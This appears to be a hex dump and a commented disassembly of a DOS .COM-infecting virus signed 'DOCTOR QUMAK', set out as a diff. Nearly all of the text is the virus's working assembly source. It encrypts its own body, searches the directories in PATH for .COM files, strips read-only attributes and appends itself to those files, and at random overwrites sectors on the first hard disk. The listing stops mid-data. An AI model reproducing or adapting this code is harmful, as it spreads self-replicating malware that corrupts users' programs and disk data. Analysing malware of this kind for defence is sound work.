114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q.............
|
||||
114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u..
|
||||
114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!.........
|
||||
114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,.
|
||||
114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V...........
|
||||
114E:0170 04 00 AC AE 75 ED E2 FA-5E 07 89 BC 16 00 8B FE ....u...^.......
|
||||
114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:..
|
||||
114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,..
|
||||
114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.<
|
||||
114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[......
|
||||
114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\.........
|
||||
114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N.....
|
||||
114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s...
|
||||
114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y...
|
||||
114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V..
|
||||
114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C....
|
||||
114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C.....
|
||||
114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=......
|
||||
114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!..
|
||||
114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u..
|
||||
114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e..
|
||||
114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=.
|
||||
114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC
|
||||
114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-.............
|
||||
114E:02A0 EF F7 01 89 0D B4 40 B9-88 02 8B D6 81 EA F9 01 ......@.........
|
||||
114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B....
|
||||
114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........
|
||||
114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!.............
|
||||
114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C.
|
||||
114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!.....
|
||||
114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3.
|
||||
114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F.
|
||||
114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM
|
||||
114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET.
|
||||
114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM
|
||||
114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 ..
|
||||
114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
|
||||
114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .?????
|
||||
114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h
|
||||
114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO
|
||||
114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|.
|
||||
|
||||
|
|
@ -0,0 +1,533 @@
|
|||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
org 100h
|
||||
|
||||
start: jmp l_02F3 ;0100 E9 01F0
|
||||
db 6Bh,73h,0CAh,0Eh ;contamination ptr ;0103 6B 73 CA 0E
|
||||
|
||||
|
||||
org 2F3h
|
||||
;----------------------------------------------
|
||||
l_02F3: push cx ;02F3 51
|
||||
mov dx,offset d_0683 ;coded virus part addr ;02F4 BA 0683
|
||||
nop ;02F7 90
|
||||
|
||||
;<--------- encoding
|
||||
push dx ;02F8 52
|
||||
pop bx ;02F9 5B
|
||||
mov cx,0F9h ;coded block length ;02FA B9 00F9
|
||||
mov si,dx ;02FD 8B F2
|
||||
dec si ;02FF 4E
|
||||
mov dl,[si] ;0300 8A 14
|
||||
inc si ;0302 46
|
||||
l_0303: mov al,[bx] ;encoding loop ;0303 8A 07
|
||||
xor al,dl ;0305 32 C2
|
||||
nop ;0307 90
|
||||
mov [bx],al ;0308 88 07
|
||||
inc bx ;030A 43
|
||||
loop l_0303 ;030B E2 F6
|
||||
mov dx,si ;030D 8B D6
|
||||
|
||||
;<----- restore changed bytes
|
||||
xor ax,ax ;030F 33 C0
|
||||
xor bx,bx ;0311 33 DB
|
||||
cld ;0313 FC
|
||||
mov si,dx ;0314 8B F2
|
||||
add si,0ADh ;x_00AD ;saved bytes address ;0316 .81 C6 00AD
|
||||
mov di,100h ;target address ;031A .BF 0100
|
||||
mov cx,7 ;changed bytes ;031D B9 0007
|
||||
nop ;0320 90
|
||||
rep movsb ;0321 F3/ A4
|
||||
|
||||
mov si,dx ;0323 8B F2
|
||||
mov byte ptr ds:[si+0F8h],0 ;x_00F8 ;0325 C6 84 00F8 00
|
||||
mov ah,30h ;get DOS version nr ;032A B4 30
|
||||
int 21h ;032C CD 21
|
||||
cmp al,0 ;major version ;032E 3C 00
|
||||
nop ;0330 90
|
||||
jnz l_0335 ;0331 75 02
|
||||
nop ;0333 90
|
||||
nop ;0334 90
|
||||
l_0335: mov bp,0BFh ;x_00BF ;0335 BD 00BF
|
||||
add bp,si ;0338 03 EE
|
||||
mov byte ptr ds:[bp],0 ;033A 3E: C6 46 00 00
|
||||
push es ;033F 06
|
||||
nop ;0340 90
|
||||
mov ah,2Fh ;get DTA ptr into es:bx ;0341 B4 2F
|
||||
int 21h ;0343 CD 21
|
||||
mov [si],bx ;x_0000 ;0345 89 1C
|
||||
mov [si+2],es ;x_0002 ;0347 8C 44 02
|
||||
pop es ;034A 07
|
||||
mov dx,5Fh ;x_005F ;034B .BA 005F
|
||||
add dx,si ;034E 03 D6
|
||||
mov ah,1Ah ;set DTA to ds:dx ;0350 B4 1A
|
||||
int 21h ;0352 CD 21
|
||||
push es ;0354 06
|
||||
push si ;0355 56
|
||||
mov es,ds:[2Ch] ;environment segment ;0356 8E 06 002C
|
||||
mov di,0 ;035A .BF 0000
|
||||
l_035D: pop si ;035D 5E
|
||||
push si ;035E 56
|
||||
add si,1Ah ;x_001A ('PATH=') ;035F 83 C6 1A
|
||||
lodsb ;0362 AC
|
||||
mov cx,8000h ;0363 B9 8000
|
||||
repne scasb ;0366 F2/ AE
|
||||
mov cx,4 ;0368 B9 0004
|
||||
l_036B: lodsb ;036B AC
|
||||
scasb ;036C AE
|
||||
jnz l_035D ;036D 75 EE
|
||||
loop l_036B ;036F E2 FA
|
||||
|
||||
;<----- Environment variable 'PATH='
|
||||
pop si ;0371 5E
|
||||
pop es ;0372 07
|
||||
mov [si+16h],di ;x_0016 ;0373 89 7C 16
|
||||
mov di,si ;0376 8B FE
|
||||
add di,1Fh ;x_001F = work buffer ;0378 83 C7 1F
|
||||
mov bx,si ;037B 8B DE
|
||||
add si,1Fh ;x_001F = work buffer ;037D 83 C6 1F
|
||||
mov di,si ;0380 8B FE
|
||||
jmp short l_03CE ;0382 EB 4A
|
||||
|
||||
;<----- next directory
|
||||
l_0384: cmp word ptr [si+16h],0 ;x_0016 = ptr in env ;0384 83 7C 16 00
|
||||
jne l_0392 ;-> not all in 'PATH' ;0388 75 08
|
||||
mov byte ptr ds:[si+0F8h],1 ;<- end of 'PATH' ;038A C6 84 00F8 01
|
||||
jmp l_04E9 ;038F E9 0157
|
||||
|
||||
l_0392: push ds ;0392 1E
|
||||
push si ;0393 56
|
||||
mov bp,0BFh ;x_00BF ;0394 .BD 00BF
|
||||
add bp,si ;0397 03 EE
|
||||
mov ds,es:[02Ch] ;environment segment ;0399 26: 8E 1E 002C
|
||||
mov di,si ;039E 8B FE
|
||||
mov si,es:[di+16h] ;ptr in environment ;03A0 26: 8B 75 16
|
||||
add di,1Fh ;pattern address ;03A4 83 C7 1F
|
||||
l_03A7: lodsb ;03A7 AC
|
||||
cmp al,';' ;directory delimiter ;03A8 3C 3B
|
||||
je l_03BB ;03AA 74 0F
|
||||
cmp al,0 ;03AC 3C 00
|
||||
je l_03B8 ;position delimiter ;03AE 74 08
|
||||
mov es:[bp],al ;03B0 26: 88 46 00
|
||||
inc bp ;03B4 45
|
||||
stosb ;03B5 AA
|
||||
jmp short l_03A7 ;03B6 EB EF
|
||||
|
||||
l_03B8: mov si,0 ;end of path ptr ;03B8 .BE 0000
|
||||
l_03BB: pop bx ;03BB 5B
|
||||
pop ds ;03BC 1F
|
||||
mov [bx+16h],si ;save current ptr ;03BD 89 77 16
|
||||
cmp byte ptr [di-1],'\' ;last path char ;03C0 80 7D FF 5C
|
||||
je l_03CE ;-> o.k. ;03C4 74 08
|
||||
mov al,'\' ;<- add dir delimiter ;03C6 B0 5C
|
||||
mov es:[bp],al ;03C8 26: 88 46 00
|
||||
inc bp ;03CC 45
|
||||
stosb ;03CD AA
|
||||
|
||||
l_03CE: mov byte ptr es:[bp],0 ;x_00BF ;03CE 26: C6 46 00 00
|
||||
mov bp,0 ;03D3 BD 0000
|
||||
mov [bx+18h],di ;[x_0018]:=x_001F ;03D6 89 7F 18
|
||||
mov si,bx ;offset d_0683 ;03D9 8B F3
|
||||
add si,10h ;x_0010 ('*.COM') ;03DB 83 C6 10
|
||||
mov cx,6 ;03DE B9 0006
|
||||
rep movsb ;03E1 F3/ A4
|
||||
mov si,bx ;03E3 8B F3
|
||||
mov ah,4Eh ;find 1st filenam match @ds:dx ;03E5 B4 4E
|
||||
mov dx,01Fh ;x_001F (file pattern) ;03E7 .BA 001F
|
||||
add dx,si ;03EA 03 D6
|
||||
mov cx,3 ;attribute pattern ;03EC B9 0003
|
||||
int 21h ;03EF CD 21
|
||||
jmp short l_0429 ;03F1 EB 36
|
||||
|
||||
;<----- next file in the same directory
|
||||
l_03F3: mov bp,0BFh ;file name address ;03F3 .BD 00BF
|
||||
add bp,si ;03F6 03 EE
|
||||
push bp ;03F8 55
|
||||
mov ax,0 ;03F9 B8 0000
|
||||
dec bp ;03FC 4D
|
||||
l_03FD: inc bp ;03FD 45
|
||||
cmp byte ptr ds:[bp],'\' ;begin of file name ;03FE 3E: 80 7E 00 5C
|
||||
jne l_0407 ;0403 75 02
|
||||
mov ax,bp ;possibly here ;0405 8B C5
|
||||
l_0407: cmp byte ptr ds:[bp],0 ;end of filename ? ;0407 3E: 80 7E 00 00
|
||||
jne l_03FD ;-> not now ;040C 75 EF
|
||||
cmp ax,0 ;have been any dir ? ;040E 3D 0000
|
||||
pop bp ;0411 5D
|
||||
jnz l_041B ;-> yes ;0412 75 07
|
||||
mov byte ptr ds:[bp],0 ;<- we are in the root ;0414 3E: C6 46 00 00
|
||||
jmp short l_0425 ;0419 EB 0A
|
||||
|
||||
l_041B: mov bp,ax ;end of path address ;041B 8B E8
|
||||
mov byte ptr ds:[bp+1],0 ;end ptr ;041D 3E: C6 46 01 00
|
||||
mov bp,0 ;0422 BD 0000
|
||||
l_0425: mov ah,4Fh ;find next file match ;0425 B4 4F
|
||||
int 21h ;0427 CD 21
|
||||
|
||||
|
||||
l_0429: jnc l_042E ;0429 73 03
|
||||
jmp l_0384 ;-> end of files in current dir ;042B E9 FF56
|
||||
|
||||
l_042E: mov bp,0BFh ;x_00BF = victim name ;042E .BD 00BF
|
||||
add bp,si ;0431 03 EE
|
||||
dec bp ;0433 4D
|
||||
l_0434: inc bp ;0434 45
|
||||
cmp byte ptr ds:[bp],0 ;find end of path ;0435 3E: 80 7E 00 00
|
||||
jne l_0434 ;043A 75 F8
|
||||
mov di,bp ;043C 8B FD
|
||||
mov bp,0 ;043E BD 0000
|
||||
push si ;0441 56
|
||||
add si,7Dh ;x_007D - DTA-file name ;0442 83 C6 7D
|
||||
l_0445: lodsb ;add file name ;0445 AC
|
||||
stosb ;0446 AA
|
||||
cmp al,0 ;0447 3C 00
|
||||
jne l_0445 ;0449 75 FA
|
||||
pop si ;044B 5E
|
||||
mov dx,si ;044C 8B D6
|
||||
add dx,0BFh ;x_00BF = file name ;044E .81 C2 00BF
|
||||
mov ax,3D00h ;open file R/O ;0452 B8 3D00
|
||||
int 21h ;0455 CD 21
|
||||
jnc l_045C ;0457 73 03
|
||||
jmp l_0384 ;-> error, next dir ;0459 E9 FF28
|
||||
|
||||
l_045C: mov bx,ax ;file handle ;045C 8B D8
|
||||
mov dx,0B8h ;x_00B8 = file buffer ;045E .BA 00B8
|
||||
add dx,si ;0461 03 D6
|
||||
mov cx,7 ;bytes to read ;0463 B9 0007
|
||||
mov ah,3Fh ;read handle ;0466 B4 3F
|
||||
int 21h ;0468 CD 21
|
||||
mov ah,3Eh ;close handle ;046A B4 3E
|
||||
int 21h ;046C CD 21
|
||||
mov di,0BBh ;4,5,6,7 bytes from file;046E .BF 00BB
|
||||
add di,si ;0471 03 FE
|
||||
mov bx,0B4h ;contam. ptr pattern ;0473 .BB 00B4
|
||||
add bx,si ;0476 03 DE
|
||||
mov ax,[di] ;0478 8B 05
|
||||
cmp ax,[bx] ;047A 3B 07
|
||||
jne l_0489 ;-> not infected yet ;047C 75 0B
|
||||
mov ax,[di+2] ;047E 8B 45 02
|
||||
cmp ax,[bx+2] ;0481 3B 47 02
|
||||
jne l_0489 ;-> not infected yet ;0484 75 03
|
||||
l_0486: jmp l_03F3 ;-> allready infected ;0486 E9 FF6A
|
||||
|
||||
l_0489: cmp word ptr [si+79h],0FA00h ;file size ;0489 81 7C 79 FA00
|
||||
nop ;048E 90
|
||||
ja l_0486 ;-> to big ;048F 77 F5
|
||||
cmp word ptr [si+79h],0Ah ;file size ;0491 83 7C 79 0A
|
||||
jb l_0486 ;-> to small ;0495 72 EF
|
||||
mov di,[si+18h] ;678Bh ?? ;0497 8B 7C 18
|
||||
push si ;049A 56
|
||||
add si,7Dh ;DTA - file name ;049B 83 C6 7D
|
||||
l_049E: lodsb ;049E AC
|
||||
stosb ;049F AA
|
||||
cmp al,0 ;04A0 3C 00
|
||||
jne l_049E ;04A2 75 FA
|
||||
pop si ;04A4 5E
|
||||
mov ax,4300h ;get file attrb, nam@ds:dx ;04A5 B8 4300
|
||||
mov dx,01Fh ;file name ;04A8 .BA 001F
|
||||
push si ;04AB 56
|
||||
pop si ;04AC 5E
|
||||
add dx,si ;04AD 03 D6
|
||||
int 21h ;04AF CD 21
|
||||
mov [si+8],cx ;save oryginal attributes ;04B1 89 4C 08
|
||||
mov ax,4301h ;set file attrb, nam@ds:dx ;04B4 B8 4301
|
||||
and cl,0FEh ;clear R/O ;04B7 80 E1 FE
|
||||
mov dx,01Fh ;04BA .BA 001F
|
||||
add dx,si ;04BD 03 D6
|
||||
int 21h ;04BF CD 21
|
||||
|
||||
mov ax,3D02h ;open file R/W ;04C1 B8 3D02
|
||||
mov dx,01Fh ;file name address ;04C4 .BA 001F
|
||||
add dx,si ;04C7 03 D6
|
||||
int 21h ;04C9 CD 21
|
||||
jnc l_04D0 ;-> O.K. ;04CB 73 03
|
||||
jmp l_0638 ;-> error ;04CD E9 0168
|
||||
l_04D0: mov bx,ax ;file handle ;04D0 8B D8
|
||||
mov ax,5700h ;get file date & time ;04D2 B8 5700
|
||||
int 21h ; DOS Services ah=function 57h ;04D5 CD 21
|
||||
mov [si+4],cx ;04D7 89 4C 04
|
||||
mov [si+6],dx ;04DA 89 54 06
|
||||
mov ah,2Ch ;get time ;04DD B4 2C
|
||||
int 21h ;04DF CD 21
|
||||
and dh,7 ;seconds ;04E1 80 E6 07
|
||||
jz l_04E9 ;04E4 74 03
|
||||
jmp l_0572 ;-> contamine ;04E6 E9 0089
|
||||
|
||||
;<- end of 'PATH' members
|
||||
l_04E9: push bx ;04E9 53
|
||||
push si ;04EA 56
|
||||
mov ah,8 ;read parameters for drive dl ;04EB B4 08
|
||||
mov dl,80h ;HDD 0 ;04ED B2 80
|
||||
int 13h ;04EF CD 13
|
||||
cmp dl,0 ;nr of fixed disks ;04F1 80 FA 00
|
||||
je l_0562 ;-> no HDD ;04F4 74 6C
|
||||
mov al,cl ;04F6 8A C1
|
||||
and al,3Fh ; '?' ;04F8 24 3F
|
||||
mov ds:[si+0F4h],al ;04FA 88 84 00F4
|
||||
mov al,ch ;04FE 8A C5
|
||||
mov ah,cl ;0500 8A E1
|
||||
and ah,0C0h ;0502 80 E4 C0
|
||||
mov cl,6 ;0505 B1 06
|
||||
shr ah,cl ;0507 D2 EC
|
||||
mov ds:[si+0F1h],ax ;0509 89 84 00F1
|
||||
mov ds:[si+0F3h],dh ;050D 88 B4 00F3
|
||||
l_0511: mov ah,2Ch ; ',' ;0511 B4 2C
|
||||
int 21h ; DOS Services ah=function 2Ch ;0513 CD 21
|
||||
; get time, cx=hrs/min, dh=sec
|
||||
shr dl,1 ;0515 D0 EA
|
||||
shr dl,1 ;0517 D0 EA
|
||||
and dl,7 ;0519 80 E2 07
|
||||
cmp dl,ds:[si+0F3h] ;051C 3A 94 00F3
|
||||
ja l_0511 ;0520 77 EF
|
||||
mov ds:[si+0F7h],dl ;0522 88 94 00F7
|
||||
push ds ;0526 1E
|
||||
mov ax,0 ;0527 B8 0000
|
||||
mov ds,ax ;052A 8E D8
|
||||
mov bx,046Ch ;052C .BB 046C
|
||||
mov ax,[bx] ;052F 8B 07
|
||||
mov dx,[bx+2] ;0531 8B 57 02
|
||||
pop ds ;0534 1F
|
||||
div word ptr ds:[si+0F1h] ;0535 F7 B4 00F1
|
||||
l_0539: cmp dx,ds:[si+0F1h] ;0539 3B 94 00F1
|
||||
jbe l_0543 ;053D 76 04
|
||||
shr dx,1 ;053F D1 EA
|
||||
jmp short l_0539 ;0541 EB F6
|
||||
l_0543: mov ds:[si+0F5h],dx ;0543 89 94 00F5
|
||||
mov ax,dx ;0547 8B C2
|
||||
mov dl,80h ;0549 B2 80
|
||||
mov dh,ds:[si+0F7h] ;054B 8A B4 00F7
|
||||
mov ch,al ;054F 8A E8
|
||||
mov cl,6 ;0551 B1 06
|
||||
shl ah,cl ;0553 D2 E4
|
||||
mov cl,ah ;0555 8A CC
|
||||
mov ah,3 ;0557 B4 03
|
||||
or cl,1 ;0559 80 C9 01
|
||||
mov al,ds:[si+0F4h] ;055C 8A 84 00F4
|
||||
int 13h ; Disk dl=drive 0 ah=func 03h ;0560 CD 13
|
||||
; write sectors from mem es:bx
|
||||
|
||||
;<-----
|
||||
l_0562: pop si ;0562 5E
|
||||
pop bx ;0563 5B
|
||||
cmp byte ptr ds:[si+0F8h],0 ;x_00F8 ;0564 80 BC 00F8 00
|
||||
je l_056E ;-> O.K. ;0569 74 03
|
||||
jmp l_0647 ;-> no 'PATH' ;056B E9 00D9
|
||||
|
||||
l_056E: jmp l_0628 ;056E E9 00B7
|
||||
nop ;0571 90
|
||||
|
||||
;<----- contamine file
|
||||
l_0572: mov ah,3Fh ; '?' ;0572 B4 3F
|
||||
mov cx,7 ;0574 B9 0007
|
||||
mov dx,0ADh ;0577 .BA 00AD
|
||||
add dx,si ;057A 03 D6
|
||||
int 21h ; DOS Services ah=function 3Fh ;057C CD 21
|
||||
; read file, cx=bytes, to ds:dx
|
||||
jnc l_0583 ;057E 73 03
|
||||
jmp l_0628 ;0580 E9 00A5
|
||||
l_0583: cmp ax,7 ;0583 3D 0007
|
||||
je l_058B ;0586 74 03
|
||||
jmp l_0628 ;0588 E9 009D
|
||||
l_058B: mov ax,4202h ;058B B8 4202
|
||||
mov cx,0 ;058E B9 0000
|
||||
mov dx,0 ;0591 BA 0000
|
||||
int 21h ; DOS Services ah=function 42h ;0594 CD 21
|
||||
; move file ptr, cx,dx=offset
|
||||
jnc l_059B ;0596 73 03
|
||||
jmp l_0628 ;0598 E9 008D
|
||||
l_059B: mov cx,ax ;059B 8B C8
|
||||
sub ax,3 ;059D 2D 0003
|
||||
mov [si+0Eh],ax ;05A0 89 44 0E
|
||||
add cx,490h ;05A3 81 C1 0490
|
||||
mov di,si ;05A7 8B FE
|
||||
sub di,38Eh ;05A9 81 EF 038E
|
||||
mov [di],cx ;05AD 89 0D
|
||||
mov ah,40h ; '@' ;05AF B4 40
|
||||
mov cx,489h ;05B1 B9 0489
|
||||
mov dx,si ;05B4 8B D6
|
||||
sub dx,390h ;05B6 81 EA 0390
|
||||
push dx ;05BA 52
|
||||
push cx ;05BB 51
|
||||
push bx ;05BC 53
|
||||
push ax ;05BD 50
|
||||
mov ah,2Ch ; ',' ;05BE B4 2C
|
||||
int 21h ; DOS Services ah=function 2Ch ;05C0 CD 21
|
||||
; get time, cx=hrs/min, dh=sec
|
||||
mov dl,cl ;05C2 8A D1
|
||||
add dl,dh ;05C4 02 D6
|
||||
add dl,82h ;05C6 80 C2 82
|
||||
mov [si-1],dl ;05C9 88 54 FF
|
||||
mov bx,si ;05CC 8B DE
|
||||
mov cx,0F9h ;05CE B9 00F9
|
||||
|
||||
l_05D1: mov al,[bx] ;05D1 8A 07
|
||||
xor al,dl ;05D3 32 C2
|
||||
mov [bx],al ;05D5 88 07
|
||||
inc bx ;05D7 43
|
||||
loop l_05D1 ;05D8 E2 F7
|
||||
|
||||
pop ax ;05DA 58
|
||||
pop bx ;05DB 5B
|
||||
pop cx ;05DC 59
|
||||
pop dx ;05DD 5A
|
||||
int 21h ; DOS Services ah=function 40h ;05DE CD 21
|
||||
; write file cx=bytes, to ds:dx
|
||||
push dx ;05E0 52
|
||||
push cx ;05E1 51
|
||||
push bx ;05E2 53
|
||||
push ax ;05E3 50
|
||||
mov bx,si ;05E4 8B DE
|
||||
mov cx,0F9h ;05E6 B9 00F9
|
||||
mov dl,[si-1] ;05E9 8A 54 FF
|
||||
|
||||
l_05EC: mov al,[bx] ;05EC 8A 07
|
||||
xor al,dl ;05EE 32 C2
|
||||
nop ;05F0 90
|
||||
mov [bx],al ;05F1 88 07
|
||||
inc bx ;05F3 43
|
||||
loop l_05EC ;05F4 E2 F6
|
||||
|
||||
pop ax ;05F6 58
|
||||
pop bx ;05F7 5B
|
||||
pop cx ;05F8 59
|
||||
pop dx ;05F9 5A
|
||||
jc l_0628 ;05FA 72 2C
|
||||
cmp ax,489h ;05FC 3D 0489
|
||||
jne l_0628 ;05FF 75 27
|
||||
mov ax,4200h ;0601 B8 4200
|
||||
nop ;0604 90
|
||||
mov cx,0 ;0605 B9 0000
|
||||
mov dx,0 ;0608 BA 0000
|
||||
int 21h ; DOS Services ah=function 42h ;060B CD 21
|
||||
; move file ptr, cx,dx=offset
|
||||
jc l_0628 ;060D 72 19
|
||||
mov ah,40h ; '@' ;060F B4 40
|
||||
mov cx,3 ;0611 B9 0003
|
||||
mov dx,si ;0614 8B D6
|
||||
add dx,0Dh ;0616 83 C2 0D
|
||||
int 21h ; DOS Services ah=function 40h ;0619 CD 21
|
||||
; write file cx=bytes, to ds:dx
|
||||
mov cx,4 ;061B B9 0004
|
||||
mov dx,si ;061E 8B D6
|
||||
add dx,0B4h ;0620 .81 C2 00B4
|
||||
mov ah,40h ; '@' ;0624 B4 40
|
||||
int 21h ; DOS Services ah=function 40h ;0626 CD 21
|
||||
; write file cx=bytes, to ds:dx
|
||||
l_0628: mov dx,[si+6] ;0628 8B 54 06
|
||||
nop ;062B 90
|
||||
mov cx,[si+4] ;062C 8B 4C 04
|
||||
mov ax,5701h ;062F B8 5701
|
||||
int 21h ; DOS Services ah=function 57h ;0632 CD 21
|
||||
; get/set file date & time
|
||||
mov ah,3Eh ; '>' ;0634 B4 3E
|
||||
int 21h ; DOS Services ah=function 3Eh ;0636 CD 21
|
||||
; close file, bx=file handle
|
||||
l_0638: mov ax,4301h ;0638 B8 4301
|
||||
mov cx,[si+8] ;063B 8B 4C 08
|
||||
mov dx,01Fh ;063E .BA 001F
|
||||
nop ;0641 90
|
||||
add dx,si ;0642 03 D6
|
||||
nop ;0644 90
|
||||
int 21h ; DOS Services ah=function 43h ;0645 CD 21
|
||||
; get/set file attrb, nam@ds:dx
|
||||
|
||||
;<----- EXIT
|
||||
l_0647: push ds ;0647 1E
|
||||
mov ah,1Ah ;set DTA to ds:dx ;0648 B4 1A
|
||||
mov dx,[si] ;saved victim DTA ;064A 8B 14
|
||||
mov ds,[si+2] ;064C 8E 5C 02
|
||||
int 21h ;064F CD 21
|
||||
pop ds ;restore registers ;0651 1F
|
||||
pop cx ;0652 59
|
||||
xor ax,ax ;0653 33 C0
|
||||
xor bx,bx ;0655 33 DB
|
||||
xor dx,dx ;0657 33 D2
|
||||
xor si,si ;0659 33 F6
|
||||
nop ;065B 90
|
||||
mov di,100h ;Victim entry point ;065C .BF 0100
|
||||
nop ;065F 90
|
||||
push di ;0660 57
|
||||
nop ;0661 90
|
||||
xor di,di ;0662 33 FF
|
||||
retn ;-> run victim ;0664 C3
|
||||
|
||||
db 1,2,3 ;0665 01 02 03
|
||||
db 1,2,3 ;0668 01 02 03
|
||||
db 4,5,6 ;066B 04 05 06
|
||||
|
||||
db 0Dh,0Ah ;066E 0D 0A
|
||||
db '(C) DOCTOR QUMAK' ;0670 28 43 29 20 44 4F 43 54
|
||||
;0678 4F 52 20 51 55 4D 41 4B
|
||||
db 0Dh,0Ah ;0680 0D 0A
|
||||
|
||||
db 0B6h ;klucz kodowania ;0682 B6
|
||||
|
||||
d_0683 label byte
|
||||
|
||||
x_0000 dw 0080h ;victim DTA offset ;0000 80 00
|
||||
x_0002 dw 10ABh ;victim DTA segment ;0003 AB 10
|
||||
x_0004 dw 9BEFh ;victim time stamp ;0004 EF 9B
|
||||
x_0006 dw 1587h ;victim date stamp ;0006 87 15
|
||||
x_0008 dw 0020h ;victim attribute ;0008 20 00
|
||||
|
||||
db 0E9h,0F9h,00h ;000A E9 F9 00
|
||||
db 0E9h,0F0h,01h ;000D E9 F0 01
|
||||
|
||||
x_0010 db '*.COM',0 ;0010 2A 2E 43 4F 4D 00
|
||||
x_0016 dw 002Ah ;ptr in environment ;0016 2A 00
|
||||
|
||||
x_0018 dw 678Bh ;??? ;0018 8B 67
|
||||
|
||||
x_001A db 'PATH=' ;001A 50 41 54 48 3D
|
||||
x_001F db 'CS.COM',0 ;001F 43 53 2E 43 4F 4D 00
|
||||
db '.COM', 0 ;0026 2E 43 4F 4D 00
|
||||
db 'T.COM', 0 ;002B 54 2E 43 4F 4D 00
|
||||
db 'OM',0 ;0031 4F 4D 00
|
||||
db 43 dup (' ') ;0034 002B[20]
|
||||
|
||||
;<----- virus DTA
|
||||
x_005F db 04h ;005F 04
|
||||
db '????????COM' ;0060 0008[3F] 43 4F 4D
|
||||
db 03h,14h,00h,51h,01h,00h,00h,00h,00h ;006B 03 14 00 51 01 00 00 00 00
|
||||
x_0074 db 20h ;attribute found ;0074 20
|
||||
x_0075 dw 9BEFh ;time stamp ;0075 EF 9B
|
||||
x_0077 dw 1587h ;date stamp ;0077 87 15
|
||||
x_0079 dw 01F3h,0 ;file size ;0079 F3 01 00 00
|
||||
x_007D db 'CS.COM',0,' COM',0,0 ;file name ;007D 43 53 2E 43 4F 4D 00 20 43 4F 4D 00 00
|
||||
|
||||
db 0EAh,0F0h ;008A EA F0
|
||||
db 0FFh, 00h,0F0h ;008C FF 00 F0
|
||||
db 'Hello world from my virus !',0Dh,0Ah,'$' ;008F 48 65 6C 6C 6F 20
|
||||
;0095 77 6F 72 6C 64 20
|
||||
;009B 66 72 6F 6D 20 6D
|
||||
;00A1 79 20 76 69 72 75
|
||||
;00A7 73 20 21 0D 0A 24
|
||||
;<----- Saved victim bytes
|
||||
x_00AD db 0EBh,00h,1Eh,0B8h,00h,00h,50h ;00AD EB 00 1E B8 00 00 50
|
||||
|
||||
;contamination pattern
|
||||
x_00B4 db 6Bh,73h,0CAh,0Eh ;00B4 6B 73 CA 0E
|
||||
|
||||
;<----- file buffer
|
||||
x_00B8 db 0EBh,00h,1Eh ;00B8 EB 00 1E
|
||||
x_00BB db 0B8h,00h,00h,50h ;contam.ptr.here ;00BB B8 00 00 50
|
||||
|
||||
x_00BF db 'CS.COM',0 ;file name & path ;00BF 43 53 2E 43 4F 4D 00
|
||||
db '.COM',0 ;00C6 2E 43 4F 4D 00
|
||||
db 'T.COM', 0 ;00CB 54 2E 43 4F 4D 00
|
||||
db 'M',0 ;00D1 4D 00
|
||||
db ' the stuff that should be here' ;00D3 20 74 68 65 20 73
|
||||
;00D9 74 75 66 66 20 74
|
||||
